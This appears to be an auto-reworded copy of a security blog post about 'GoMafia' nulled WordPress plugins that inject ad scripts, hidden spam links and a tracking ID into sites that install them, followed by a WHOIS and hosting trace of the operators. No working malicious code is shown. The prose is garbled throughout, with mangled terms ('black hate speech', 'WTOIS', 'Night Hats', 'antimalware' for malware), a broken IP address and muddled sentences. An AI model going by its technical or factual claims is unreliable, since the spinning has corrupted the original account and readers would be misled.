Nulled Wordpress Themes 2016New Wordpress Topics 2016
The Nulled WordPress Themes: Malevertising And Black Hat SoEO
On this occasion I'll tell you another tale that blends all the above problems: nulled Plugins, black hate speech, misvertising and a softwares developer that turned to the downside. The head of our reminiscence department, Bruno Zanelato, recently cleansed a website and found this bit of coding in a WordPress plug-in:
Consequently, the cdn. gomafia[. ]com retrieved source text was injection into the bottom line of each page of the site. Inserted coding varies by using different catchwords or sentences of advertising scripts, but you can always see these three major parts: Performing other people's advertisements on your site is probably not what you expected when you installed a plug-in.
After the ad script, you will see a cluster of my spam link blocks pointing to gomafia[. ].com and three other pages. Because of this tags the link is not displayed on compromised websites: Let's get back to the PHP stuff we found in the plug-in. Additionally to the pgma_footer, she also defined this pgma_styles feature (used in the wp_enqueue_scripts hook): wp_enqueue_style('gomafia', plugin_dir_url(__FILE__).'gma. css'); We can see how this WordPress command causes the pgma. style sheet files from the plugin's folder to be included on every page.
It' clear now what makes the left side hidden. As well as advertisements and spam link spam, the virus will inject a Google Analytics identifier with username UA-5133396-16 into each compromised web page (it is possible to use more than one trace on the same web page). It can help to display all page impressions with their projected advertisements on all compromised websites.
The Google Analytics tracker can also help us identify ourselves as the owner of the compromised websites in the Google Search Console. There is no information as to whether the attacker actually tried to do it, but we cannot rule out this option because some other illegal websites have verified themselves as the owner of the compromised websites in the search console.
Which GoMafia anyway? As we found the evil stuff in the plug-in, the first thing we asked was whether it was part of the actual plug-in or if it was hacked. Because it was a premier plug-in, it was difficult to preserve its initial sources. In addition, premier plug-ins seldom ( if ever ) fall back on such tips - their creators monetise their work directly by reselling their plug-ins.
When the GoMafia [. ].com page was opened, the reply to the query about the source of the evil codes became clear. On this page you will find a selection of "nulled" topics and plugs, mainly from CodeCanyon. In order to test our assumption, we have a few topics and plugs from this page to download. They all included the gma_footer source text that would inject the contents of the page hxxp://cdn.gomafia[. ]com into web pages of websites they were installing.
It' s noteworthy that the GoMafia[. ].com site also uses the same ad script that generates bothersome ( and mostly vicious ) pop-ups and pop-ups. In addition, their link downloads use adf[. ]ly interactive pages that display advertisements before being redirected to the real page. By digging a little further, we can give some other interesting information about the folks behind this GoMafia Night Hats advertising campaigns.
WTOIS recordings show that the gomafia [. ].com domainname was just a few month ago, on 8 March 2016, by Viji Sathish from the state of Tamil Nadu in India. Checking the WTOIS for the other three sites we see in the Block of my Spam link, we will find that they all have exactly the same registry addresses, but are from " Sathishkumar M ".
Despite the fact that the four pages in the Spammy linkblock look different at first sight (nulled softwares, inside designs, vouchers and porn), they all share the same identity and GoMafia is injecting this linkblock into third parties' web pages to foster their own resource and not third parties' web pages.
Let us see what else is customary between these four locations. In addition, kenzest[. ].com and coupontwit[. ].com (one of the spamming links) are housed on the same 192 servers. Most of the pages (including gomafia[. ]com) are behind the CloudFlare wall, making it difficult to see their actual IP address.
However, if we modify the IP of gomafia [. ].com in our /etc/hosts to 192. 21 . 192, we will find that the GoMafia site is actually located on the same servers as kenzest[.]com. We will find the same postal and telephone number on the contacts page as in the gomafia[. ]com about.
It seems that Sathish was still trying to find a good use for his computer programming abilities. Probably their whitehat businesses weren't so prosperous and they finally started exploring the obscure side of web marketing: pornography, obtrusive advertisements, illegal advertising, illegal advertising, illegal content, counterfeiting, software leakage and misuse of third parties' websites.
Kenzest Technologies also offers a range of advanced business management (SEO) solutions. GoMafia [. ]com is only part of their strategic approach to SEO: Let as many pages as possible nulled their plug-in installation. And as a proof of concepts, you can add hyperlinks to your own pages and keep up with the results. As soon as they have reached a certain standard on compromised websites and find paid customers interested in their own service, they can replace their own link with their customer link.
Meanwhile, they're trying to monetise their GoMafia projects with advertisements (intrusive and mostly malicious): on their websites, in downloading hyperlinks and on the websites that scare them. In light of the choices made so far, they can readily substitute the cdn. gomafia[. ].com latent link and ad for more serious forms of malware when they find out how to monetise them.
Or they put a backdoor and antimalware directly into the protected plugin like many other similar websites do. Once again this tale shows us why it is always a poor concept to have " free " premier quality softwares installed on your website and what makes users want to provide such "nulled" themes and plug-ins "for free".
It' s just a crime based buisness scheme where instead of directly pay your suppliers, you pay your customers by giving them the opportunity to misuse your website and your people. In fact, any third-party components you deploy on your website can potentially cause safety problems such as loopholes, viruses, malware, spamming, or simply exploitable weaknesses.
You should ask yourself these question whenever you are installing something: Is my website really using this piece of music? Could I rely on the resource from which I purchased this piece of work? In order to minimise risk, use free of charge favourite repository management tools such as Plugin Directory or Theme Directory. Everyday many folks are downloading and testing it there.
A further possibility is the direct purchasing of premier quality products from their developer or distributor. In this way, you help the developer and make sure that you get the genuine unmodified work.